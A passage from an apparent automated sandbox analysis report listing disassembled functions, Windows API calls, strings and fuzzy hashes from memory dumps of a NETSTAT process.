                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f8b1749a16742cce6a2c4743433c6401147adbf2d688799e6a875af9c099537
                                                                                                                                                                                  • Instruction Fuzzy Hash: 08216576A10219ABDB11EF79DC40AEEBBF8EF4C640F580526E905E7200E730D9128BA5
                                                                                                                                                                                  Function 00642812 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00642835
                                                                                                                                                                                  • GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000105), ref: 00642853
                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0064285D
                                                                                                                                                                                  • _wsystem.MSVCRT ref: 00642885
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DirectoryErrorLastSystem_wsystemmemset
                                                                                                                                                                                  • String ID: \route.exe" print
                                                                                                                                                                                  • API String ID: 786266830-1087285068
                                                                                                                                                                                  • Opcode ID: 964946680693131ed91929bcbaaadb80d841bb91addcccb872372c17bf3e10ea
                                                                                                                                                                                  • Instruction ID: 34cc1c1b82c75200566366c77de5616e78ab01f16dace6c2a1456c3dbd81fc4d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 964946680693131ed91929bcbaaadb80d841bb91addcccb872372c17bf3e10ea
                                                                                                                                                                                  • Instruction Fuzzy Hash: EF018B30A40305EFDB10FB64DD5EB9D777A9F05700F501095B605E7181EB74AA49CB41
                                                                                                                                                                                  Function 030FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031402BD
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 0314031E
                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031402E7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                  • Opcode ID: 43c09e6bbbd4737f0c4b3ddf4df66ee262ff818c9d2366df3ecfdd089edc8448
                                                                                                                                                                                  • Instruction ID: 648380d2aef7be1907babf21ec347c9391defd1ee4c1d55d237b63ae244a9cb3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c09e6bbbd4737f0c4b3ddf4df66ee262ff818c9d2366df3ecfdd089edc8448
                                                                                                                                                                                  • Instruction Fuzzy Hash: 91E1AC706097429FD724CF29C884B6AF7E4BB8C714F180A6DF6A58B6E0DB74D845CB42
                                                                                                                                                                                  Function 0310BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 03147B8E
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 03147BAC
                                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03147B7F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                                  • Opcode ID: daf583670034357ce11678dabb77f863c476c58d120509cc78831ef346409ae5
                                                                                                                                                                                  • Instruction ID: 66e0bfb5dd08616519e1ad324b8b126794f31cd307df62878066ff4d5e230402
                                                                                                                                                                                  • Opcode Fuzzy Hash: daf583670034357ce11678dabb77f863c476c58d120509cc78831ef346409ae5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7141E2353057029FC724DE25C840B6AB7E5EF8D710F044A2DF9AA9B6C0DB71E8458B91
                                                                                                                                                                                  Function 0310B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0314728C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 031472A3
                                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03147294
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 031472C1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                                  • Opcode ID: eb8542c9910a87b1000864bf11793b84c82626528a7dce99c7c38fe1b78c6a19
                                                                                                                                                                                  • Instruction ID: 51a6ed4f055fbe105d8430082e73d87ab7d982807d9e55a42229fd7ddf12ae53
                                                                                                                                                                                  • Opcode Fuzzy Hash: eb8542c9910a87b1000864bf11793b84c82626528a7dce99c7c38fe1b78c6a19
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F41FF35704206ABC720DE65CC41FAAB7A9FF8C710F144A19F866EB280DB61E8528BD1
                                                                                                                                                                                  Function 03182300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                                                  • Opcode ID: d2932465ab31fbbae53b03a17f0a3a7bcf128e5d85d64eeae73ff4547cfddf33
                                                                                                                                                                                  • Instruction ID: d29a8a6508ab65eff9463ee72e9c4beb71ff021336529addd24515c8876b1b6c
                                                                                                                                                                                  • Opcode Fuzzy Hash: d2932465ab31fbbae53b03a17f0a3a7bcf128e5d85d64eeae73ff4547cfddf33
                                                                                                                                                                                  • Instruction Fuzzy Hash: A3316676A102199FCB21DF29CC50BEEB7F8EF4C610F844595EC49E7240EB309A558FA4
                                                                                                                                                                                  Function 00643B5D Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 246COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 006448A5: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000000,00000000,?,00000000,00000000,?,?,?,006443B7,0000275D,00000000,00000000,?), ref: 006448CA
                                                                                                                                                                                    • Part of subcall function 006437EC: htons.WS2_32(?), ref: 0064381C
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,00000001,?,?,00000000,0000274F,?), ref: 00643DF9
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000001,?,?,00000000,0000274F,?), ref: 00643E59
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00643E60
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLocal$FormatMessagehtons
                                                                                                                                                                                  • String ID: o$d
                                                                                                                                                                                  • API String ID: 523628632-134025704
                                                                                                                                                                                  • Opcode ID: 9ec2c97b9a221ef95c1146054c7d13221c4c792025f15ef73df02d5e2bae9031
                                                                                                                                                                                  • Instruction ID: 8e716fc3338e61c6c27394955ddc4c37caca1caf9b35ceed97b3095a2276e816
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ec2c97b9a221ef95c1146054c7d13221c4c792025f15ef73df02d5e2bae9031
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F81B572D08238AFEB219A64CC8AFEAB77ADB05700F100099F50DB6381DA75AF45DF51
                                                                                                                                                                                  Function 00645950 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00645E48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00645E4F
                                                                                                                                                                                  • __set_app_type.MSVCRT ref: 00645962
                                                                                                                                                                                  • __p__fmode.MSVCRT ref: 00645978
                                                                                                                                                                                  • __p__commode.MSVCRT ref: 00645986
                                                                                                                                                                                  • __setusermatherr.MSVCRT ref: 006459A7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1632413811-0
                                                                                                                                                                                  • Opcode ID: eb1a9b06be3ce2e5789e226dbd1a464cf67648a098e1794640c59d46869f4bd5
                                                                                                                                                                                  • Instruction ID: 73ee9a43ef5ac6b75fb9bdaf75e37c8cba0c6da7aa1d7e1c656c2a0054e4efdd
                                                                                                                                                                                  • Opcode Fuzzy Hash: eb1a9b06be3ce2e5789e226dbd1a464cf67648a098e1794640c59d46869f4bd5
                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F0AC78508745DFE764AF30EC4A5083B63A707325B506A5EE422873F2DF7595418A15
                                                                                                                                                                                  Function 03117D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction ID: 6b20fbf3d0edd8d7d75dcfed9a72229366678170dea3d479fe30bb903884fb7b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction Fuzzy Hash: 52918171E0021A9BDF24DE69C891AFFB7A5AF4C720F18853AE875E73C0D73099A18751
                                                                                                                                                                                  Function 030D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                  • Opcode ID: 7f834764dcd9c77332d0cc2b0e49a97c24df445654439c7663d13d47d51ba1ba
                                                                                                                                                                                  • Instruction ID: bd93e1a8cfddc15e5621aa22308b3d08ad68d3d639bcab8c61510c9f1f0df7ca
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f834764dcd9c77332d0cc2b0e49a97c24df445654439c7663d13d47d51ba1ba
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B814AB5D012699BDB25DB54CC44BEEB7B8AF49710F0445EAE909B7280E7309E85CFA0
                                                                                                                                                                                  Function 00644A6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00646139: __iob_func.MSVCRT ref: 0064613E
                                                                                                                                                                                  • fprintf.MSVCRT ref: 00644A94
                                                                                                                                                                                  • SnmpUtilMemAlloc.SNMPAPI(00000168,?,00000000,000000FF,00000000,?,00641F9B,?,00000000,000000FF), ref: 00644AE1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocSnmpUtil__iob_funcfprintf
                                                                                                                                                                                  • String ID: GetTable: type = %d
                                                                                                                                                                                  • API String ID: 2435445832-851864366
                                                                                                                                                                                  • Opcode ID: 78e244992695c21cea8ff8ecc4210194f4aba6379ba2336407e8df85d5b41dea
                                                                                                                                                                                  • Instruction ID: 622ecfb73d2a322f22234e1a2d7d133fe8ec16b05668c2c92cd5516a9e2511e6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 78e244992695c21cea8ff8ecc4210194f4aba6379ba2336407e8df85d5b41dea
                                                                                                                                                                                  • Instruction Fuzzy Hash: CA11EB75BC4320EBD7215B089C47B6B7697EBC1750F240016FA066B2CCCEB08C82A39E